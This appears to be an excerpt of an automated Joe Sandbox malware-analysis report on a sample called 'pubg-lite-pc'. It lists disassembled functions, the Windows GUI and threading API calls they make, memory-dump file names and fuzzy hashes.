                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f051817c2c978b611c33c33ceb847a6f498858c915daace756c6a08da8a4de3
                                                                                                • Instruction ID: 7ecce8eabfb317348adfb87883807ef3c97d0919fa8d7e78313723eafb6cd918
                                                                                                • Opcode Fuzzy Hash: 4f051817c2c978b611c33c33ceb847a6f498858c915daace756c6a08da8a4de3
                                                                                                • Instruction Fuzzy Hash: EAC1A272A082169FDB02CF98D880BBDBBB8BF5E304F094159E558AB285CB75D941CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093DF30 Relevance: 7.7, APIs: 5, Instructions: 234windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000000), ref: 0093E072
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 0093E127
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0093E1C6
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0093E271
                                                                                                  • Part of subcall function 009311F0: RaiseException.KERNEL32(00000000,00000000,00000000,00000000,00A4308A,C000008C,00000001,?,00A430BB,00000000,?,009351A7,00000000,F4D3B90A,000000FF,?), ref: 009311FC
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0093E2F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 1853712985-0
                                                                                                • Opcode ID: 3e3f13e37f999411de73c17b76402cd383aa72f23c555c1dbb17099226d4aca0
                                                                                                • Instruction ID: f61440657e921fb70a62356de5b23408f18c5ccb869ab536e091b1b0943aeada
                                                                                                • Opcode Fuzzy Hash: 3e3f13e37f999411de73c17b76402cd383aa72f23c555c1dbb17099226d4aca0
                                                                                                • Instruction Fuzzy Hash: 92B127B1D10359DBEB21CF54CD54BDABBB5BF58308F10829AE9186B280E7B55A84CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00993E40 Relevance: 7.7, APIs: 5, Instructions: 184windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00993E82
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00993EE1
                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00993FEA
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00994081
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0099409A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 2178440468-0
                                                                                                • Opcode ID: 1c5935cbb73c7c2975b9267c3dbf606cb4da898f6a383022c2e159f6311d9c2f
                                                                                                • Instruction ID: 8b24aada94a5c08a10520292eb612aa798bc908d4f8535390f56de8792c6a7ac
                                                                                                • Opcode Fuzzy Hash: 1c5935cbb73c7c2975b9267c3dbf606cb4da898f6a383022c2e159f6311d9c2f
                                                                                                • Instruction Fuzzy Hash: 62716E71901609AFEB21CFA8CD88BDEBBF9FF48314F144618F416A7291DB74AA44CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092E560 Relevance: 7.6, APIs: 5, Instructions: 120windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMessageSendWindow
                                                                                                • String ID:
                                                                                                • API String ID: 799199299-0
                                                                                                • Opcode ID: 6108ac9266b2d0228b8a5843e44cc8cff8c57318dd4e29585fef668cf4048cad
                                                                                                • Instruction ID: 802bc3f4a50939e747f5ff4bd384f4a5c3932c2f0250498062003b1b680e2871
                                                                                                • Opcode Fuzzy Hash: 6108ac9266b2d0228b8a5843e44cc8cff8c57318dd4e29585fef668cf4048cad
                                                                                                • Instruction Fuzzy Hash: 6041B036200222DFC725CF14E8D8EA6B7AEFBA4311F084869E545C7665D732E858DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093E720 Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0093E72B
                                                                                                • SendMessageW.USER32(?,?,?,0000102B), ref: 0093E788
                                                                                                • SendMessageW.USER32(?,?,?,0000102B), ref: 0093E7D7
                                                                                                • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 0093E7E8
                                                                                                • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 0093E7F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: 24d4b5f7a931bf364253cc5a76af47e0f4af9245694c52415f36450e29c3baf9
                                                                                                • Instruction ID: c1d8aaaa9bd305ac8504562801fbba53e5b54d94493bec17c4c17b6ee105602f
                                                                                                • Opcode Fuzzy Hash: 24d4b5f7a931bf364253cc5a76af47e0f4af9245694c52415f36450e29c3baf9
                                                                                                • Instruction Fuzzy Hash: DD214F31918346A6D220DF11CD45B5ABBF5BFED758F206B0EF1D0211E4EBF195848E86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00985210 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 364windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(8BFFFCD4,00001109,00000002,?), ref: 00985341
                                                                                                • SendMessageW.USER32(?,00001109,00000000,?), ref: 00985516
                                                                                                • SendMessageW.USER32(8BFFFCD4,00001109,00000000,00000000), ref: 0098563B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: AI_TREE_ITEMS_IMAGES
                                                                                                • API String ID: 3850602802-1473826576
                                                                                                • Opcode ID: 4ec6f9a29ead8ae50a1a4521019a10e9bcc24a0ada1588de6791fc1ecc1b21f0
                                                                                                • Instruction ID: 94d89318add21bb17eeabb010c28ee614151a35a3b3aa8b685c110e80b602cb2
                                                                                                • Opcode Fuzzy Hash: 4ec6f9a29ead8ae50a1a4521019a10e9bcc24a0ada1588de6791fc1ecc1b21f0
                                                                                                • Instruction Fuzzy Hash: A4E13A70E01609EFDB14DFA9C948BAEBBF9FF48311F148269E515A73A0DB749904CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00971E30 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 332windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000004,?), ref: 00971F9E
                                                                                                  • Part of subcall function 00971BE0: SendMessageW.USER32(?,0000110A,00000004,?), ref: 00971C3D
                                                                                                  • Part of subcall function 00971BE0: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00971C5F
                                                                                                  • Part of subcall function 00971BE0: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00971C81
                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00971FC4
                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00971FEA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: d
                                                                                                • API String ID: 3850602802-2564639436
                                                                                                • Opcode ID: 91773695323c935657d40a3490cb0d4b25f5264813933c5f1af70b4785468a57
                                                                                                • Instruction ID: ec3320c854b6a2864f4ca49d7cb1bf2acee937055133518454a5e48aa844bb25
                                                                                                • Opcode Fuzzy Hash: 91773695323c935657d40a3490cb0d4b25f5264813933c5f1af70b4785468a57
                                                                                                • Instruction Fuzzy Hash: EAD14C71A04258DFDB20CFA4CC84BDEB7B9BF59304F5480A9E509AB291DB70AE45CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009433B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                  • Part of subcall function 00995990: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,0093DCD8,00000000,80004005), ref: 009959FB
                                                                                                  • Part of subcall function 00995990: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00995A2B
                                                                                                • SendMessageW.USER32(?,00001036,00000004,00000004), ref: 0094356C
                                                                                                • SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00943583
                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 009435DF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$AllocateHeapWindow
                                                                                                • String ID: QuickSelectionList
                                                                                                • API String ID: 3168177373-3633591268
                                                                                                • Opcode ID: 1f1a4880524a53c192d3faa845b24c5b9f5c3119306447d1b980a8707113eafd
                                                                                                • Instruction ID: 584e3419b858fb13daefe29b273636b56d56a72cf1a5248412e1d2b98a4c3634
                                                                                                • Opcode Fuzzy Hash: 1f1a4880524a53c192d3faa845b24c5b9f5c3119306447d1b980a8707113eafd
                                                                                                • Instruction Fuzzy Hash: 3A819A71A002059BCB14DF69C894BEEF7F9FF89324F148659E856A7290DB70A904CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00952C80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(00A6E6FD,?), ref: 00952CD3
                                                                                                • SetWindowPos.USER32(00A6E6FD,00000000,00000000,00000000,00000001,?,00000016), ref: 00952D8B
                                                                                                • SetWindowPos.USER32(00A6E6FD,00000000,00000000,00000000,00000000,00000000,00000237), ref: 00952DC8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect
                                                                                                • String ID: AI_CF_TITLE_TEXT_STYLE
                                                                                                • API String ID: 3200805268-878329017
                                                                                                • Opcode ID: be3655aa590139f4d6016b19b9422b5c1e75cc264c3bae864f2baedd3e47e846
                                                                                                • Instruction ID: 6b332971cbb4599f60eaa4814682c2a6a4ff970783884b85ba39a40668a4d607
                                                                                                • Opcode Fuzzy Hash: be3655aa590139f4d6016b19b9422b5c1e75cc264c3bae864f2baedd3e47e846
                                                                                                • Instruction Fuzzy Hash: 6A911571E00609EFDB14CFA8C945B9DFBF5FF59300F148219E415AB2A4EB34AA49CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009800D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00980298
                                                                                                • SetWindowLongW.USER32(?,000000F0,-00000040), ref: 009802C1
                                                                                                • SendMessageW.USER32(?,00000170,?,00000000), ref: 009802DA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow$AllocateHeapMessageSend
                                                                                                • String ID: Icon
                                                                                                • API String ID: 2762098956-3316025061
                                                                                                • Opcode ID: d50976e22d33ddc35aed701c8a5d7133e770ec01c21e7e42162c099c27b52a1c
                                                                                                • Instruction ID: 0f2438209a679175e0d57fa5d2795a5a4196d4ec3e26d55230c010cd86dc725f
                                                                                                • Opcode Fuzzy Hash: d50976e22d33ddc35aed701c8a5d7133e770ec01c21e7e42162c099c27b52a1c
                                                                                                • Instruction Fuzzy Hash: B6618071A00608AFDB15DFA8CC85FEEB7B9FF48324F144669E526A7291DB30AD04CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00965C40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,F4D3B90A), ref: 00965CA3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Event
                                                                                                • String ID: AiPredefOpen
                                                                                                • API String ID: 4201588131-276091389
                                                                                                • Opcode ID: 42624f48f1d3d446fc54087a5ce47e829eed9d04084bf0e80d0931e512fef94b
                                                                                                • Instruction ID: a8ab880d3dd1a7b63147e5c48c1c8b6c5de3bdcd5e71d9542b31a739d123e593
                                                                                                • Opcode Fuzzy Hash: 42624f48f1d3d446fc54087a5ce47e829eed9d04084bf0e80d0931e512fef94b
                                                                                                • Instruction Fuzzy Hash: 6F617075A00A05EFDB24CFA4C898BAABBB8EF49314F154519D412AB6E0D735EA05CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0095E9F0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 0095EA2E
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,00000008,00000604), ref: 0095EBF3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect
                                                                                                • String ID: AiDlgHeight$AiDlgWeight
                                                                                                • API String ID: 3200805268-871102398
                                                                                                • Opcode ID: 2e5e1da6a7ae3420268b472b4a275197ee6dde5663bfa8fc21ba4edd5534ef3a
                                                                                                • Instruction ID: e369a8cdeef11f3b6c561fda8f5fe66b47c2c7eb9526c55887aca47889013846
                                                                                                • Opcode Fuzzy Hash: 2e5e1da6a7ae3420268b472b4a275197ee6dde5663bfa8fc21ba4edd5534ef3a
                                                                                                • Instruction Fuzzy Hash: FC616E71D00249DFDB04CFA9D985BDEBBB9FF54314F14816AE812AB391D734AA09CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00966270 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162synchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00A07C20: GetCurrentProcessId.KERNEL32(F4D3B90A), ref: 00A07C63
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,?,_uis_evt,00000008,F4D3B90A,?,?,?), ref: 0096630F
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0002EF90,00000000,00000000,00000000), ref: 00966489
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009664B6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create$CurrentEventObjectProcessSingleThreadWait
                                                                                                • String ID: _uis_evt
                                                                                                • API String ID: 2980154694-897742952
                                                                                                • Opcode ID: c1182e6ae0027389e9e7fcab883f44fada415ea1af5e76ebb0e3c3a2ea0c3952
                                                                                                • Instruction ID: bb3361824bff42236810e934d6298ac44c952d33076af79c9a451e9446081ef7
                                                                                                • Opcode Fuzzy Hash: c1182e6ae0027389e9e7fcab883f44fada415ea1af5e76ebb0e3c3a2ea0c3952
                                                                                                • Instruction Fuzzy Hash: B77137B0D04648EBDB14DFA5C985BDDFBB0FF48314F608259D018AB290EBB56A09CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EE680 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,F4D3B90A), ref: 009EE6B4
                                                                                                  • Part of subcall function 009B4340: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000001,?,80070057,?,?,?,80004005,?,80004005), ref: 009B4358
                                                                                                  • Part of subcall function 009B4340: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,00000001,?,80070057,?,?,?,80004005,?,80004005), ref: 009B438B
                                                                                                  • Part of subcall function 009311F0: RaiseException.KERNEL32(00000000,00000000,00000000,00000000,00A4308A,C000008C,00000001,?,00A430BB,00000000,?,009351A7,00000000,F4D3B90A,000000FF,?), ref: 009311FC
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
